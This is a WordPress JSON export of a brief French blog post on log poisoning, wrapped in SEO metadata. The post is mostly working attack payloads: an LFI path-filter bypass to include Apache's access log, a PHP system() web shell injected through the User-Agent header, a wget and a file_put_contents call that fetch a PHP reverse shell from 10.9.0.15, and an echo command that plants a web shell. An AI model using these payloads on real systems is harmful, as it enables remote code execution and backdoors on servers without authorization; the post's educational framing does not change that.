{"id":445,"date":"2021-06-26T18:36:40","date_gmt":"2021-06-26T23:36:40","guid":{"rendered":"https:\/\/www.searchevolution.com\/security\/?p=445"},"modified":"2021-06-26T22:19:17","modified_gmt":"2021-06-27T03:19:17","slug":"log-poisoning","status":"publish","type":"post","link":"https:\/\/www.searchevolution.com\/security\/2021\/06\/26\/log-poisoning\/","title":{"rendered":"Log poisoning"},"content":{"rendered":"

Cette technique d’infiltration se r\u00e9sume \u00e0 ex\u00e9cuter une commande et \u00e0 lire le r\u00e9sultat dans le fichier journal du serveur web. La commande s’injecte via le User-Agent.<\/p>\n

\nhttp:\/\/www.vulnerable.com\/test.php?view=\/var\/www\/html\/development_testing\/..\/.\/..\/.\/..\/log\/apache2\/access.log&cmd=ls\n<\/code><\/pre><\/p>\n
On remarquera qu’ici le serveur est vuln\u00e9rable \u00e0 l’inclusion local de fichier (LFI) et que le script filtre les requ\u00eates avec “..\/..” et c’est la raison pour laquelle nous ins\u00e9rons un .\/ entre 2 remont\u00e9es dans le chemin d’acc\u00e8s. La commande \u00e0 ex\u00e9cuter est ls. Nous pourrions ex\u00e9cuter une commande cmd=wget http:\/\/10.9.0.15\/php-reverse-shell.php pour t\u00e9l\u00e9charger un backdoor sur le serveur.<\/p>\n
Il suffit d’intercepter la requ\u00eate avec BURP pour changer le User-Agent:
\n
\nMozilla\/5.0 <?php system($_GET['cmd']); ?> Gecko\/20100101 Firefox\/78.0\n<?php file_put_contents('shell4.php', file_get_contents('http:\/\/10.9.0.15\/php-reverse-shell.php'))?>  #autre alternative si nous avons de la difficult\u00e9 \u00e0 obtenir un reverse shell code\n<\/code><\/pre><\/p>\n
Pour la premi\u00e8re alternative, nous pourrions par exemple, uploader \u00e0 la suite de la requ\u00eate avec l’agent “Mozilla\/5.0  Gecko\/20100101 Firefox\/78.0″ un shell avec une commande echo<\/p>\n
http:\/\/www.vulnerable.com\/test.php?view=\/var\/www\/html\/development_testing\/..\/.\/..\/.\/..\/log\/apache2\/access.log&cmd=echo "test.php?<?php system(\\$_GET['cmd']); ?>" > test.php\n<\/code><\/pre><\/p>\n
Et le tour est jou\u00e9!<\/p>\n","protected":false},"excerpt":{"rendered":"
Cette technique d’infiltration se r\u00e9sume \u00e0 ex\u00e9cuter une commande et \u00e0 lire le r\u00e9sultat dans le fichier journal du serveur web. La commande s’injecte via le User-Agent. http:\/\/www.vulnerable.com\/test.php?view=\/var\/www\/html\/development_testing\/..\/.\/..\/.\/..\/log\/apache2\/access.log&cmd=ls On remarquera qu’ici le serveur est vuln\u00e9rable \u00e0 l’inclusion local de fichier (LFI) et que le script filtre les requ\u00eates avec “..\/..” et c’est la raison pour laquelle nous ins\u00e9rons un .\/ entre 2 remont\u00e9es dans le chemin d’acc\u00e8s. La commande \u00e0 ex\u00e9cuter est ls. Nous pourrions ex\u00e9cuter une commande cmd=wget http:\/\/10.9.0.15\/php-reverse-shell.php pour t\u00e9l\u00e9charger un backdoor sur le serveur. Il suffit d’intercepter la requ\u00eate avec BURP pour changer le User-Agent: Mozilla\/5.0 <?php <\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"yoast_head":"\nLog poisoning - S\u00e9curiser votre site<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.searchevolution.com\/security\/2021\/06\/26\/log-poisoning\/\" \/>\n<meta property=\"og:locale\" content=\"fr_CA\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Log poisoning - S\u00e9curiser votre site\" \/>\n<meta property=\"og:description\" content=\"Cette technique d’infiltration se r\u00e9sume \u00e0 ex\u00e9cuter une commande et \u00e0 lire le r\u00e9sultat dans le fichier journal du serveur web. La commande s’injecte via le User-Agent. http:\/\/www.vulnerable.com\/test.php?view=\/var\/www\/html\/development_testing\/..\/.\/..\/.\/..\/log\/apache2\/access.log&cmd=ls On remarquera qu’ici le serveur est vuln\u00e9rable \u00e0 l’inclusion local de fichier (LFI) et que le script filtre les requ\u00eates avec “..\/..” et c’est la raison pour laquelle nous ins\u00e9rons un .\/ entre 2 remont\u00e9es dans le chemin d’acc\u00e8s. La commande \u00e0 ex\u00e9cuter est ls. Nous pourrions ex\u00e9cuter une commande cmd=wget http:\/\/10.9.0.15\/php-reverse-shell.php pour t\u00e9l\u00e9charger un backdoor sur le serveur. Il suffit d’intercepter la requ\u00eate avec BURP pour changer le User-Agent: Mozilla\/5.0 <?php\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.searchevolution.com\/security\/2021\/06\/26\/log-poisoning\/\" \/>\n<meta property=\"og:site_name\" content=\"S\u00e9curiser votre site\" \/>\n<meta property=\"article:published_time\" content=\"2021-06-26T23:36:40+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2021-06-27T03:19:17+00:00\" \/>\n<meta name=\"author\" content=\"Germain\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u00c9crit par\" \/>\n\t<meta name=\"twitter:data1\" content=\"Germain\" \/>\n\t<meta name=\"twitter:label2\" content=\"Estimation du temps de lecture\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/2021\/06\/26\/log-poisoning\/\",\"url\":\"https:\/\/www.searchevolution.com\/security\/2021\/06\/26\/log-poisoning\/\",\"name\":\"Log poisoning - S\u00e9curiser votre site\",\"isPartOf\":{\"@id\":\"https:\/\/www.searchevolution.com\/security\/#website\"},\"datePublished\":\"2021-06-26T23:36:40+00:00\",\"dateModified\":\"2021-06-27T03:19:17+00:00\",\"author\":{\"@id\":\"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/e1318e0782dc5a7d6b03471347f881d8\"},\"breadcrumb\":{\"@id\":\"https:\/\/www.searchevolution.com\/security\/2021\/06\/26\/log-poisoning\/#breadcrumb\"},\"inLanguage\":\"fr-CA\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.searchevolution.com\/security\/2021\/06\/26\/log-poisoning\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/2021\/06\/26\/log-poisoning\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\/\/www.searchevolution.com\/security\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Log poisoning\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/#website\",\"url\":\"https:\/\/www.searchevolution.com\/security\/\",\"name\":\"S\u00e9curiser votre site\",\"description\":\"Conna\u00eetre son ennemi\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.searchevolution.com\/security\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"fr-CA\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/e1318e0782dc5a7d6b03471347f881d8\",\"name\":\"Germain\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-CA\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/6a203854efbec130dd49471ccbba1abc?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/6a203854efbec130dd49471ccbba1abc?s=96&d=mm&r=g\",\"caption\":\"Germain\"},\"sameAs\":[\"https:\/\/www.searchevolution.com\/security\"],\"url\":\"https:\/\/www.searchevolution.com\/security\/author\/germain\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Log poisoning - S\u00e9curiser votre site","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.searchevolution.com\/security\/2021\/06\/26\/log-poisoning\/","og_locale":"fr_CA","og_type":"article","og_title":"Log poisoning - S\u00e9curiser votre site","og_description":"Cette technique d’infiltration se r\u00e9sume \u00e0 ex\u00e9cuter une commande et \u00e0 lire le r\u00e9sultat dans le fichier journal du serveur web. La commande s’injecte via le User-Agent. http:\/\/www.vulnerable.com\/test.php?view=\/var\/www\/html\/development_testing\/..\/.\/..\/.\/..\/log\/apache2\/access.log&cmd=ls On remarquera qu’ici le serveur est vuln\u00e9rable \u00e0 l’inclusion local de fichier (LFI) et que le script filtre les requ\u00eates avec “..\/..” et c’est la raison pour laquelle nous ins\u00e9rons un .\/ entre 2 remont\u00e9es dans le chemin d’acc\u00e8s. La commande \u00e0 ex\u00e9cuter est ls. Nous pourrions ex\u00e9cuter une commande cmd=wget http:\/\/10.9.0.15\/php-reverse-shell.php pour t\u00e9l\u00e9charger un backdoor sur le serveur. Il suffit d’intercepter la requ\u00eate avec BURP pour changer le User-Agent: Mozilla\/5.0 <?php","og_url":"https:\/\/www.searchevolution.com\/security\/2021\/06\/26\/log-poisoning\/","og_site_name":"S\u00e9curiser votre site","article_published_time":"2021-06-26T23:36:40+00:00","article_modified_time":"2021-06-27T03:19:17+00:00","author":"Germain","twitter_card":"summary_large_image","twitter_misc":{"\u00c9crit par":"Germain","Estimation du temps de lecture":"1 minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.searchevolution.com\/security\/2021\/06\/26\/log-poisoning\/","url":"https:\/\/www.searchevolution.com\/security\/2021\/06\/26\/log-poisoning\/","name":"Log poisoning - S\u00e9curiser votre site","isPartOf":{"@id":"https:\/\/www.searchevolution.com\/security\/#website"},"datePublished":"2021-06-26T23:36:40+00:00","dateModified":"2021-06-27T03:19:17+00:00","author":{"@id":"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/e1318e0782dc5a7d6b03471347f881d8"},"breadcrumb":{"@id":"https:\/\/www.searchevolution.com\/security\/2021\/06\/26\/log-poisoning\/#breadcrumb"},"inLanguage":"fr-CA","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.searchevolution.com\/security\/2021\/06\/26\/log-poisoning\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.searchevolution.com\/security\/2021\/06\/26\/log-poisoning\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/www.searchevolution.com\/security\/"},{"@type":"ListItem","position":2,"name":"Log poisoning"}]},{"@type":"WebSite","@id":"https:\/\/www.searchevolution.com\/security\/#website","url":"https:\/\/www.searchevolution.com\/security\/","name":"S\u00e9curiser votre site","description":"Conna\u00eetre son ennemi","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.searchevolution.com\/security\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"fr-CA"},{"@type":"Person","@id":"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/e1318e0782dc5a7d6b03471347f881d8","name":"Germain","image":{"@type":"ImageObject","inLanguage":"fr-CA","@id":"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/6a203854efbec130dd49471ccbba1abc?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/6a203854efbec130dd49471ccbba1abc?s=96&d=mm&r=g","caption":"Germain"},"sameAs":["https:\/\/www.searchevolution.com\/security"],"url":"https:\/\/www.searchevolution.com\/security\/author\/germain\/"}]}},"jetpack_featured_media_url":"","_links":{"self":[{"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/posts\/445"}],"collection":[{"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/comments?post=445"}],"version-history":[{"count":3,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/posts\/445\/revisions"}],"predecessor-version":[{"id":455,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/posts\/445\/revisions\/455"}],"wp:attachment":[{"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/media?parent=445"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/categories?post=445"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/tags?post=445"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}